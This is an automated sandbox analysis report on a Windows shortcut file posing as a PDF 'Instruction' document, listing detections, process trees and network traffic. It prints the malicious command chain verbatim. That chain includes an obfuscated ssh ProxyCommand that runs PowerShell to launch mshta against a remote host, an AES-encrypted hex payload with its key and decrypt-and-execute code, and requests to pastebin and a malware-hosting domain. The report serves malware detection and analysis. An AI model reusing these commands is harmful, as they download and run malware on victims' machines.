Windows Analysis Report
Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk

Overview

General Information

Sample name: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk
Analysis ID: 1576547
MD5: ae4dbbe945aeacfa5bb920e8d85cd0cb
SHA1: 36a91b26586d8e758ac0dcf09f9d5ed40de75b3a
SHA256: f767f605802f74a578ced15d21e057249c9237dc0b4c09dbadc2d0e996411e91
Tags: lnkstaticklipxuhaq-shopuser-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • ssh.exe (PID: 6480 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6568 cmdline: powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 5416 cmdline: "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2
AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591E8E2D5F71F36954FA29E50B541460253DDD47F8D68ADEC9363D782DED5421500BF4FBEE25A669215CB1C1CF9C4E39B42F859E459433536EBB2907989E1A5FC589691387EDB08362925BE79E141A8B621176532558D159FD2B1181F898AA05EEB1EA07A556D6526ACFF59D0D02B5A98F70D6AD20CB5BC07B4752386DCD6CC47CB918CA4AB8B27B8CD3B4ADEE286293420BA6F189987D8E71654846F001ADDA03742803420074C99A7E173A3AF1F07E40C7289919C5405C1BF8A5353A0076DB1E95557A94F9DD0AA6F83884FFA5DE3D8C61567935876B1F332ACB612F634FCAC6BA6072C8BE5661D6B0F2A165601A8CBF9F9DF3F753391F622DB6D5EAC28EEB76EBC8DD9D2F9B58AD024D91420FB02E416BF9CB1115FA4DE78D8634C0977354A5A3528B042F835A34E3B2AA719E59E38CC1C23AE866E10F0F6A1B75704280DB282B9F28720319946E2E42C1C71CB3CE37440E9AC836574DE323A1EE86F3FE448C5BCC423F5F8511F71FAFFCFC235341AF3D1E03B2D48457B15F12ABEBCB12BBF7D97FAE4E57BBD065FE92EAE2804E5A4CB23F8F63844CC023F22B67826B6F5D371262B7CB12B4DD1866657D6802B8BA8F65FEEF4565467CC239F917D93AAF7BE92EFCF3FCDB41866DA32FA7B3920D92A5187C3071762FD5B90058D2A5886857BBBFC1641257F8DF51B742E0D36775465ED3059DF960AA9CE6EA174
42B78E7D79CCCF6C68F3A5106F7FA91081B616E536F3C9CE9FABA62C617DB84DEA248D21129E121AC109AC1F445C0489236B29800278CE4C44AAD96EC5A84896CE52146759758532CF0EDAAF5543CAE8091A5D93E45B0489408B3933747118015539E6D2A113E6E38BBCFDBB0C4F67C4F3B9085DEAE9478F58BA64392AB67EEF40B9CDAE975CBB60252F0683FBCD6DA3213FDF689E2EC1960A3842A6DBF718CC1FB567208847E41ECB7196F3CEBE8DA67E076CF9A78D99615A6AC5376D392816D30EC3EE11E891E380AF759932052BDAD62EBAAC8A637E4C0D8E78C05F7A5292076253BC4CC8764E55D595B0A901D5F0B12D1A41B183C5DA19A74BF50D22AE7E3C3F2DC7F99B740ACF26474319680DD6305577E584D9E445067EAFF8A5FE2FFD6722D48DBD50DA9391B1E40040D72ACFD3BAFB31E573428D9A562C36830221B3FF269656E0404B04B67712ECD9A11BE2B987725683494DFBCE427CFD4B1BC13B39A1DB3364671E654F56583E1155DCCE223ADCADC21B4CFB556679B5F6413FA8E33733AC785B00BFA5085E98931898DBC97044D2831337E76508662A8F067D7A4BA9E9800685A75793E895A3E25CEBF048DA05042A904C68D3DB385A07DB95058B0339750373030ABBB0AFA8F5701AFEDDFF97243B2AA2B201452F0D179D0098D775594E469D720050081AE8A2D326F8DC507DA60618DF27FCA45C101E8B651BEE7BB35CAC6FC05F6D8D0260EE5937D0627215D14CD6F415DBDA14A23923355B710E74518171C7AB2FBF67F6E89936F33643ED072D9048B1F470D499E2269D10C4BDA3D2E036ACCEA500CEFE7B6EB2CAACA113FC36D16F917ED9BB4D740F7E41D660E15D2463EA1581C42EC6919DC1E0A780A804BCF0E7FC2AE44182EB42885D55707E32B6D71AA993BE51EAC6D7513934C870B45F0321715A29B15AD8202C074C26148ADE61ED65D21DA94F7EF5CB616C7CA5608F6354EE8B744187BEC5261B209A162E278E3B4F9D1972618759D7555C844659AC6967C78FF1B9CD0AC814EA9EF977A4760D79CDCF97A7761C23DA11D1A5CB64CADE2438719A27A3698D8838794C22809194A8649C262D4E425E84F154F6A45FC8194C9ACFDE794A4CE529562EB7F69BE5DD7637F7D7042943FB3B1DCD77A2754C765AEA874B32A2FDE6445315340AE7A630E204AA9CD2F73EF8E2C8C9CAACF9D1BDA533898FE02AC3F1A6E48CCCDF779D4D53DEAA17B40D403E87A70307F16A4B0EDED94522FC0B4BA5F4D69FD381C16E3D7ABE7F4FD4401920E00BD04985980FCE3FF2F4A011D067AF739ACCFF58A224C866E599F3AC5B49676E01AAC90B973C65C9F01103773D2D8C133ADBE06005041C7C109F8C66189516CBA309737FEDC751C4F604DF4693F58F66913EEE3B038035C1D3
78A896E499A097E3D58E2F155EF1EE0506B7B8D1A8F18A1A1A716FB7285164D8C43BC1BAA8E98F871AC05C4E24E0A7F1A3993C7169988348083581A931B0C5592E1A3CF20DBCF3863E0E76899710846AF92240621AE31CDB4920925B19B1B07C1D46518248B4D468F4DA7F5D927B04C9BE7294204DDB4652AA452003777F5A3D80EBC42403A3AD15968985046D2E4F47B912D57D5EB899EA9FA0E6694AEFEAAC0F74DF287B54DC5CBD3E3DD891ADF810B6B87075F3CF10C2453528E504E6031E48ECD4E32186B8288C916309C2F3DCFC21E4B460631C73032BBA0AA67B4862C43E4D2454A966D0EEC1D04CD5AD4CC93054B2DE87E25838794ED1F0D11F8BE4EE03D51AD54BA97622534A0116CF79240F6A875E32BEEBF8A63DB83C15492DC24402AD6F208ABC2B5D989467A41D99C8E2300B856B4F5BEFED2EBB87E453FA20A04332FE49B5D249349EB1C6F4C58D68436B04991FDC6146D4E5A4237181E91CC5FBDCD42D75F303F5FC7645670A01FBC67B3B2FB783C4BCF4531734E41CB91B3922683EAC815AC5D6BDA0DDE1F5AA1D854D3CCDB657A7BD10ABD7849EA8463695D4BF1BC5BF54D9DD96BD5C4ED2BCBC536F84874F4DE4D51A607B7F9323F3810D8F1C577884F5E3AEB489DEB99828A96B20316FC0E52F0532D61640DD20E864C91F7F9509080F57DFCDAFB9B001F39FA155ADC3CB62052E2D0B79AB0C7BC932A00900DAD44BE231A095CA9FFCAD9CB574708825CCC56E8B08BB00D88466F8F6AE6585EB08EC24FBA6457E95ACD19CB3895B9E4AFB241F1A8AEDCABBD06F61042EFD60A6C48FC87301CBF951B7C1A1FD9BD8F5A8DBD97AB57CF3D376BA65C822D9D9DA725E615BB9CAC5C3B8325C73C4DB8F8F7C4F3FCE984B1B1EADF24A839E953B914717B4761F0F37DA59CF7B7D9AB1AF204D92364E0FBF747A8CB454B34AFD4D40846BE837344A7B6C733B2FA42B4B0F96FC8FF8ED0EAFFA5F3C2DA522885C45067384');$oPMoB=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((EhNo('52786B594D45786F66546252646B4F6D')),[byte[]]::new(16)).TransformFinalBlock($mbaO,0,$mbaO.Length)); & $oPMoB.Substring(0,3) $oPMoB.Substring(186) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7056 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 984 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
  • 0x1687a:$b1: ::WriteAllBytes(
  • 0x178c0:$b1: ::WriteAllBytes(
  • 0x16832:$s1: -join
  • 0x1692c:$s1: -join
  • 0x17878:$s1: -join
  • 0x17972:$s1: -join
  • 0x54e49:$s1: -join
  • 0x555a9:$s1: -join
  • 0x62b85:$s1: -join
  • 0x72345:$s1: -join
  • 0x7f41a:$s1: -join
  • 0x827ec:$s1: -join
  • 0x82e9e:$s1: -join
  • 0x8498f:$s1: -join
  • 0x86b95:$s1: -join
  • 0x873bc:$s1: -join
  • 0x87c2c:$s1: -join
  • 0x88367:$s1: -join
  • 0x88399:$s1: -join
  • 0x883e1:$s1: -join
  • 0x88400:$s1: -join
Process Memory Space: powershell.exe PID: 6568 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | -
Process Memory Space: powershell.exe PID: 6568 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
    • 0x8a025:$b1: ::WriteAllBytes(
    • 0xe2320:$b1: ::WriteAllBytes(
    • 0x13b7f8:$b1: ::WriteAllBytes(
    • 0x25c429:$b1: ::WriteAllBytes(
    • 0xa3dc:$b2: ::FromBase64String(
    • 0x878b6:$b2: ::FromBase64String(
    • 0xdd314:$b2: ::FromBase64String(
    • 0x13ae42:$b2: ::FromBase64String(
    • 0x246f46:$b2: ::FromBase64String(
    • 0x253fa5:$b2: ::FromBase64String(
    • 0x280aee:$b2: ::FromBase64String(
    • 0x283b0f:$b2: ::FromBase64String(
    • 0xa550:$b3: ::UTF8.GetString(
    • 0x87a2a:$b3: ::UTF8.GetString(
    • 0x882d5:$b3: ::UTF8.GetString(
    • 0xdd488:$b3: ::UTF8.GetString(
    • 0x13afb6:$b3: ::UTF8.GetString(
    • 0x2470ba:$b3: ::UTF8.GetString(
    • 0x254119:$b3: ::UTF8.GetString(
    • 0x280c62:$b3: ::UTF8.GetString(
    • 0x283c83:$b3: ::UTF8.GetString(
Source | Rule | Description | Author | Strings
amsi64_6568.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | -
amsi64_6568.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | -

        System Summary

        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4, ProcessId: 5416, ProcessName: mshta.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo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
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo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
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" ., ProcessId: 6480, ProcessName: ssh.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc 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 , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']'), CommandLine: powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 6480, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']'), ProcessId: 6568, ProcessName: powershell.exe
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo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
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7056, ProcessName: svchost.exe
        No Suricata rule has matched


        AV Detection

        Source: https://berb.fitnessclub-filmfanatics.comAvira URL Cloud: Label: malware
        Source: https://berb.fitnessclub-filmfanatics.com/naailq0.cplAvira URL Cloud: Label: malware
        Source: http://berb.fitnessclub-filmfanatics.comAvira URL Cloud: Label: malware
Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk, Virustotal: Detection: 34%
Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk, ReversingLabs: Detection: 26%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.9% probability
Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk, Joe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 104.21.83.229:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 180.163.242.102:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.5:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.66.20:443 -> 192.168.2.5:49739 version: TLS 1.2
        Source: Binary string: blib.pdb source: powershell.exe, 00000009.00000002.2436299417.0000029524A40000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\Desktop\desktop.ini

        Networking

        Source: unknownDNS query: name: pastebin.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.360.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /naailq0.cpl HTTP/1.1Host: berb.fitnessclub-filmfanatics.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
        Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /api/reg/z.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cndef1.green-pathways.shopConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /raw/0v6Vhvpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /api/reg/z.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cndef1.green-pathways.shopConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /raw/0v6Vhvpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.360.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comConnection: Keep-Alive
